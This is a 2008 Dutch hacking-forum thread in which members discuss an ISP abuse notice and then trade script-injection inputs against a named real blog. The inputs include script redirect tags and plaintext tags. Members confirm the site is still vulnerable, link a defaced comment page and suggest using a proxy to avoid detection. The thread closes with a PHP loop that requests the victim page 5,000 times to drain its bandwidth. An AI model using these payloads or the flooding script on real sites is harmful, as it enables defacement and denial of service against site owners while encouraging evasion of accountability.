Welkom, Gast. Je bent niet ingelogd.

Abuse KPN

Joris
moderator
Geplaatst op: 06 May 2008, 21:20
PimpCoins: 0
💸+
Bewerken Quote

Ooi...

Een vriend van mij heeft een abuse-email van KPN ontvangen, over dat hij HTML-Tag's had ingevoerd op een site. De site was niet tegen HTML beveiligd en gaf daardoor een error.

Mijn vraag: kan die vriend daar problemen mee krijgen? En is dat strafbaar? Hij heeft er wel een abuse-email van KPN van gekregen...
En wat zou er nu gebeuren?

Thnx

Sharp
:')
moderator
Geplaatst op: 06 May 2008, 21:23
PimpCoins: 0
💸+
Bewerken Quote

Zolang hij er geen misbruik van maakt en het "uittest" en gewoon netjes meldt lijkt het me niet dat hij er gekloot mee kan krijgen. Welke site trouwens? En wordt hij gehost via zo'n gratis kpn hosting shit? En hoe kwamen ze erachter enzo. Want als iemand mijn site zou exploiten zou ik toch wel mailtje sturen naar provider.

Joris
moderator
Geplaatst op: 06 May 2008, 21:27
PimpCoins: 0
💸+
Bewerken Quote

hurktoilet.nl (??)
alleen maar wat html-tag's invoeren.

Frenk
Non-Octo
Geplaatst op: 06 May 2008, 21:32
PimpCoins: 0
💸+
Bewerken Quote

Joris schreef:

hurktoilet.nl (??)
alleen maar wat html-tag's invoeren.

Offtopic:
!!

Saven
admin
Geplaatst op: 06 May 2008, 21:33
PimpCoins: 0
💸+
Bewerken Quote

Is niet strafbaar.
Mja had ie maar een proxy moeten gebruiken ofzo

Joris
moderator
Geplaatst op: 06 May 2008, 21:36
PimpCoins: 0
💸+
Bewerken Quote

Saven schreef:

Is niet strafbaar.
Mja had ie maar een proxy moeten gebruiken ofzo

Mooi

was idd slimmer geweest

Sharp
:')
moderator
Geplaatst op: 06 May 2008, 21:40
PimpCoins: 0
💸+
Bewerken Quote

Ik kan daar geen exploit op vinden?
Saven noem eens pwnage iets wat je kan invoeren daar

[Laatst bewerkt door Sharp op dinsdag 6 mei 2008, om 21:40]
Joris
moderator
Geplaatst op: 06 May 2008, 21:49
PimpCoins: 0
💸+
Bewerken Quote

Gewoon dit: <script>

en dan laadt het formulier niet meer (van een blog).
Ik durf niet te testen of het gefixt is, wil geen problemen

Hier is zo'n link naar zo'n kut"blog": blog

[Laatst bewerkt door Joris op dinsdag 6 mei 2008, om 21:50]
JoeyK
Geplaatst op: 07 May 2008, 12:10
PimpCoins: 0
💸+
Bewerken Quote

Volgens mij is gewoon valse abuse e-mail?

Sharp
:')
moderator
Geplaatst op: 07 May 2008, 13:36
PimpCoins: 0
💸+
Bewerken Quote

zit op ipod doe zo wel ff via proxy

Saven
admin
Geplaatst op: 07 May 2008, 14:47
PimpCoins: 0
💸+
Bewerken Quote

Sharp schreef:

Ik kan daar geen exploit op vinden?
Saven noem eens pwnage iets wat je kan invoeren daar

<noscript> ofzo
of
<script>document.location='http://www.geenstijl.nl'</script>; ofzo

Sander
Geplaatst op: 07 May 2008, 16:04
PimpCoins: 0
💸+
Bewerken Quote

Die mail is waarschijnlijk gewoon fake
Post 'm hier anders.

sandr
aka Chuck Norris
Geplaatst op: 07 May 2008, 16:11
PimpCoins: 0
💸+
Bewerken Quote

hangt er wel een beetje vanaf wat je invoert, testen of een echte hack poging?

Christan
Pwn erd
Geplaatst op: 07 May 2008, 16:23
PimpCoins: 0
💸+
Bewerken Quote

Volgensmij hebben ze hem offline gehaald

Gio
Geplaatst op: 07 May 2008, 16:40
PimpCoins: 0
💸+
Bewerken Quote

Het is nog steeds lek

Digital
Animestyle.nl
Geplaatst op: 07 May 2008, 16:47
PimpCoins: 0
💸+
Bewerken Quote

<plaintext> is ook altijd wel leuk.
Maar volgens mij is dat mailt je fake.. zo gauw sturen ze niet van die mails geloof ik

Suma

Joris
moderator
Geplaatst op: 07 May 2008, 16:48
PimpCoins: 0
💸+
Bewerken Quote

haha

@ Saven:
het is:

<script>document.location.href='http://site.nl';</script>

De e-mail is echt, zijn vader had de e-mail ontvangen op een @planet.nl e-mailadres. Zijn e-mail was nergens ingevoerd.

[Laatst bewerkt door Joris op woensdag 7 mei 2008, om 16:49]
Suma
heeft gelijk
Geplaatst op: 07 May 2008, 16:50
PimpCoins: 0
💸+
Bewerken Quote

Joris schreef:

haha

@ Saven:
het is:

<script>document.location.href='http://site.nl';</script>;

De e-mail is echt, zijn vader had de e-mail ontvangen op een @planet.nl e-mailadres. Zijn e-mail was nergens ingevoerd.


ah lol. Dat had ik ook eens een keer

Je hoeft er niet veel van aan te trekken denk ik.. Die persoon doet niks fout.

Post eens een kopieetje van zo'n email

Joris
moderator
Geplaatst op: 07 May 2008, 16:53
PimpCoins: 0
💸+
Bewerken Quote

haha

E-mail kunnen we niet opzoeken (weten wachtwoord laptop v/d vader niet).

Suma
heeft gelijk
Geplaatst op: 07 May 2008, 16:56
PimpCoins: 0
💸+
Bewerken Quote

Joris schreef:

haha

E-mail kunnen we niet opzoeken (weten wachtwoord laptop v/d vader niet).

oke, ik zal het na vragen

[url]http://www.hurktoilet.nl/weblog/wreageer.php?id=2912&stuurdoor=nee[/url] power of plaintext

Joris
moderator
Geplaatst op: 07 May 2008, 17:02
PimpCoins: 0
💸+
Bewerken Quote

haha mooizo

Sharp
:')
moderator
Geplaatst op: 07 May 2008, 17:04
PimpCoins: 0
💸+
Bewerken Quote

Suma schreef:

[...]

oke, ik zal het na vragen

[url]http://www.hurktoilet.nl/weblog/wreageer.php?id=2912&stuurdoor=nee[/url] power of plaintext


Lol wtf pwned

Saven
admin
Geplaatst op: 07 May 2008, 17:05
PimpCoins: 0
💸+
Bewerken Quote

Joris schreef:

haha

@ Saven:
het is:

<script>document.location.href='http://site.nl';</script>;

De e-mail is echt, zijn vader had de e-mail ontvangen op een @planet.nl e-mailadres. Zijn e-mail was nergens ingevoerd.


Mijn script werkt ook hoor

Joris
moderator
Geplaatst op: 07 May 2008, 17:07
PimpCoins: 0
💸+
Bewerken Quote

oh oke da's ook mooi

Joris
moderator
Geplaatst op: 07 May 2008, 18:52
PimpCoins: 0
💸+
Bewerken Quote

Ik laat nu de file_get_contents() van de site while'n, de server slaat geen cache op dus het kost lekker veel dataverkeer xD

1
2
3
4
5
6
7
8
9
10
11
12
<?php
$i = 0;
$aantal = 5000;

while ($aantal>$i) {
    file_get_contents("http://www.hurktoilet.nl/weblog/wreageer.php?id=2912&stuurdoor=nee");
    $i++;
}

echo "lollollol";

?>

[Laatst bewerkt door Joris op woensdag 7 mei 2008, om 18:54]
📫

Nieuw privébericht

🔥

Registreren


Login